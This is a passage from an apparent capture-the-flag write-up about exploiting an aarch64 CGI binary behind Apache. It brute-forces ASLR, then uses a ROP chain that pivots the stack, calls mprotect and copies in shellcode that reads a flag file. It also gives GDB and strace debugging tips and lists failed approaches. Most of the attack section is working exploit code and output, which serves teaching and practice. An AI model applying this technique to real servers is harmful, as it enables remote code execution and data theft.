We need to run this in the VM (as it has ASLR), and we will fail a lot of times. So let’s write a helper function that runs the payload n times and counts how often each distinct output appears:

import collections

def run_and_collect(n):
    msgs = collections.Counter()
    payload = rop()
    for i in range(n):
        print(f"{i} / {n}", end='\r')
        res = run(payload)
        msgs.update([res])

    for msg, count in msgs.most_common():
        print(f"{count}/{n}: {msg}")

9968/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
19/10000: b'Content-type: text/html\n\n'
9/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
4/10000: b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'

4 in 10000, not too good, but also not too bad.

Adding the rest of the rop chain

Now that we found a way to get an exploit that bruteforces aslr, let’s add the rest of the rop chain we had written.

def rop():
  keyvals = [
    b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
    b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
  ]

  keyvals += [b'a=b'] * (0x34 - len(keyvals))
  # The last entry should leave the stack aligned on a 16-byte boundary.
  # As aarch64 will crash if sp is not aligned to 16 bytes.
  # the read buffer starts at an address ending with 8, so we need
  # to add an extra 8 bytes to align it to 16 bytes.
  payload = b'&'.join(keyvals) + b'a='
  payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'

  """
    If everything went well, we are executing the stack pivot gadget:
    0x0000000000440408:
      mov sp, x29;
      ldp x19, x20, [sp, #0x10];
      ldp x21, x22, [sp, #0x20];
      ldp x23, x24, [sp, #0x30];
      ldp x29, x30, [sp], #0x40;
      ret;
  """
  elf = pwn.ELF('./pwn.cgi')
  rop = pwn.ROP(elf)

  mprotect_addr = 0x420440
  mapping_addr = 0x47d000
  mprotect_size = 0x1000
  mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
  
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x4057dc)   # x30, x2-load gadget
  rop.raw(0xdeadbeef) # x19
  rop.raw(0xdeadbeef) # x20
  rop.raw(0xdeadbeef) # x21
  rop.raw(0xdeadbeef) # x22
  rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
  rop.raw(0x427d0c) # x24, x16-branch gadget

  """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.

  0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
  """

  """
    The x16-branch gadget loads x16, x1, x0, x29 and x30 from
    the stack, advances the stack and branches to x16.

  0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16; 
  """
  rop.raw(0xdeadbeef) # x29
  rop.raw(0x00445100) # x30, memcpy addr.
  for i in range((0x60-0x10)//8):
    rop.raw(0xdeadbeef) # filling until 0x60
  rop.raw(mprotect_addr) # sp + 0x60
  rop.raw(0xdeadbeef) # sp + 0x68
  rop.raw(0xdeadbeef) # sp + 0x70
  rop.raw(mprotect_size) # sp + 0x78 x1, size
  rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
  for i in range((0xb0 - 0x88)//8):
    rop.raw(0xdeadbeef) # Filling until 0xb0.

  code = shellcode()

  memcpy(rop, mapping_addr, code, mapping_addr)
  
  payload += rop.chain()
  return payload

Let’s create the fake flag:

echo -n "srelabs{fake-flag}" > /tmp/flag

$ python3 babyarm.py 
b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
b'Content-type: text/html\n\n'
b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
b'Content-type: text/html\n\nHello, World\n\x00srelabs{fake-flag}'

Trying it against the webserver.

Now that we have an exploit that seems to work locally, let’s try it against our apache2 server.

$ python3 babyarm.py 
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''

It seems like it doesn’t work. We can debug it by attaching strace to all the apache2 processes and checking out some of the system calls:

$ sudo strace -ffff -e trace=openat,write -p 2289 -p 1167876 -p 1167875 -s 1000 2> syscalls

Then I watched the file until I confirmed that my payload was executing (I searched for “Hello”). From there, I saw two errors:

malformed header from script 'pwn.cgi': Bad header: Hello, World\n"
[pid 2193032] openat(AT_FDCWD, "/tmp/flag", O_RDONLY) = -1 ENOENT (No such file or directory)

For the first one, it turns out that if we call write directly, we might be missing some of the previous buffered output, and the cgi-bin scripts need to start with the Content-type: text/html\n\n header. We can fix this by adding that to our shellcode:

"""
(...)
hello_world:
  .asciz "Content-Type: text/html\\n\\nHello, World\\n"
hello_world_len = . - hello_world
"""

For the second one, it looks like apache2 didn’t have access to the /tmp/flag file, but I checked and it did. I moved the flag to /flag and it worked.

$ python3 babyarm.py 
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''
b'Hello, World\n\x00srelabs{fake-flag}'

And finally, we can try it in the real server… But it will take some time.

Multiple attempts in the same payload.

Before, we observed that if we ended up with a low address in sp, we would be able to modify more values from further down the keys list. So let’s take advantage of that and create a payload that targets multiple possible layouts of the address space.

The lowest we can go is 0x0110, as we cannot use a NUL-byte. So this leaves us with at most 0x20 entries in the keys area to use, after that, we will always be outside the byte range. So in the end, we can only add 8 payloads:

def first_payload(base_addr):
  return [
    b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(base_addr + 0x8),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 0x38),
    b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 168),
    b'\x08\x04\x44=' + b'a'*28 + pwn.p16(base_addr + 168 + 0x70),
  ]

def rop():
  keyvals = []
  keyvals += first_payload(0x0910) # 0x20
  keyvals += first_payload(0x0810) # 0x1c
  keyvals += first_payload(0x0710) # 0x18
  keyvals += first_payload(0x0610) # 0x14
  keyvals += first_payload(0x0410) # 0x10
  keyvals += first_payload(0x0310) # 0x0c
  keyvals += first_payload(0x0210) # 0x08
  keyvals += first_payload(0x0110) # 0x04
  # rest of the rop code follows (...)

9796/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
97/10000: b'Content-type: text/html\n\n'
82/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
25/10000: b'Content-type: text/html\n\nContent-Type: text/plain\n\nHello, World\n\x00srelabs{fake-flag}'

A bit better. One in 400 tries seems reasonable. When I ran it against the real server, it found the flag in less than 200 tries (lucky, I guess).

b'Hello, World\n\x00SRLABS{______________}\n'
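To put those success rates in perspective, here is a rough back-of-the-envelope calculation. It assumes that every attempt is independent and succeeds with the rate measured locally, which may not hold on the real server; the function names are made up for this sketch.

```python
def expected_attempts(successes, runs):
    """Average number of tries per success at the measured rate."""
    return runs / successes

def chance_within(successes, runs, attempts):
    """Probability of at least one success within `attempts` tries."""
    p = successes / runs
    return 1 - (1 - p) ** attempts

print(expected_attempts(4, 10000))   # single-layout payload
print(expected_attempts(25, 10000))  # multi-layout payload
print(round(chance_within(25, 10000, 200), 2))
```

Under those assumptions, the multi-layout payload needs about 400 tries on average, and getting the flag within 200 tries happens roughly 39% of the time.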

GDB Debugging Tips

Using gdb to debug aslr issues can be cumbersome. Something you can do is re-run the program automatically until we hit our breakpoint.

Retrying after exit / crashes

You can do this with break commands. Set one at _exit and for all signals:

(gdb) b _exit
Breakpoint 1 at 0x41ebe0
(gdb) commands
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>run < payload
>end
(gdb) catch signal
Catchpoint 2 (standard signals)
(gdb) commands
Type commands for breakpoint(s) 2, one per line.
End with a line saying just "end".
>run < payload
>end

Conditional Breakpoints

If you are still seeing too much noise, you can also set conditional breakpoints.

Gotchas & Failed Attempts

While working on this challenge, I found some stuff that I wish I knew earlier, and there was also a lot of trial and error. This section describes all of that.

sp must be aligned to 16 at all times.
The code executed in QEMU and in the VM was different because glibc picks which implementation to use for string functions.
The CGI-bin’s output needs to start with a Content-Type header followed by a blank line (for example, Content-Type: text/plain\n\n).
strace makes a difference between open and openat.

Failed Experiments

Write to non-stack areas

You can change the value of the keys_ptr, but you cannot write NUL-bytes, which means that you can’t go outside of the stack.

Writing into values pointers.

If you provide an empty key, then you can change where the value gets copied to, but there doesn’t seem to be anything you can do there.

Going back to `main` or `parse_body`.

I kept wanting to reuse main, to read more from the buffer (you can’t because CGI-Bin script), or to reexecute everything with some changes. I couldn’t think of a way to use that.

Environment Variables.

You can control some environment variables, but I couldn’t think how to use them in any meaningful way. I even wrote a test cgi-bin script to print them out and see what can be done. You can’t write NUL-bytes to them, which limits the amount of stuff you can do.

#include <stdio.h>

int main(int argc, char** argv, char** envp) {
    printf("Content-type: text/html\n\n");

    printf("stack addr: %p\n", __builtin_frame_address(0));
    printf("argc: %d\n", argc);
    printf("argv: %p\n", argv);
    printf("envp: %p\n", envp);

    for (size_t i = 0; argv[i] != NULL; i++) {
        printf("argv[%zu] (%p -> %p): %s\n", i, &argv[i], argv[i], argv[i]);
    }

    for (size_t i = 0; envp[i] != NULL; i++) {
        printf("envp[%zu] (%p -> %p): %s\n", i, &envp[i], envp[i], envp[i]);
    }

    return 0;
}

Sending raw http requests.

I also tried sending manually crafted HTTP requests to the endpoint, thinking that maybe I would be able to see anything different, but I couldn’t.

Stack Layout Analysis.

There seems to be some slight biases towards one set of addresses vs others, but in the end, it didn’t feel like it made a difference.

Pass a huge read buffer.

The read system call that is done in main is huge. However, if you pass a huge buffer, it caps at around 32KiB.

Being able to change `x12`.

Before finding the issue with strncpy in QEMU vs the VM, I thought it would be possible to control x12, and I was able to do so to some extent: I could set a full 64 bit value to it, without NUL-bytes, nor &, nor =:

def rop():
  keyvals = [
    b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
    b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
    b'=' + b'\xbc'*18 + pwn.p64(0xdeadbeefabad1dea),
  ]

And in gdb, after setting up a breakpoint, I can see:

(gdb) p /x $x12
$1 = 0xdeadbeefabad1dea

This meant that we could add something to sp, but it has to be something huge. Basically, this means we can subtract stuff from it. Sadly, our read buffer was after sp, so subtracting stuff didn’t do us any good. I also thought about subtracting from the stack pointer after main’s return, but even with that, I was missing another gadget.
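To make the "huge value means subtraction" point concrete, here is a small sketch of the arithmetic. It models `add sp, sp, x12` as 64-bit wraparound addition; the sp value is just an example taken from the earlier gdb session, the x12 value is one I picked for illustration, and the helper names are hypothetical.

```python
MASK64 = (1 << 64) - 1

def add_sp(sp, x12):
    """Model `add sp, sp, x12` with 64-bit wraparound."""
    return (sp + x12) & MASK64

def has_nul_byte(value):
    """True if the 64-bit little-endian encoding contains a zero byte."""
    return 0 in value.to_bytes(8, "little")

sp = 0x550079b2d0
x12 = 0xfffffffffffff0f0  # NUL-free; equals -0xf10 as a signed 64-bit value

assert not has_nul_byte(x12)
assert add_sp(sp, x12) == sp - 0xf10
# A small positive addend such as 0x5950 always has NUL bytes in its upper
# half, so it cannot be written with this primitive.
assert has_nul_byte(0x5950)
```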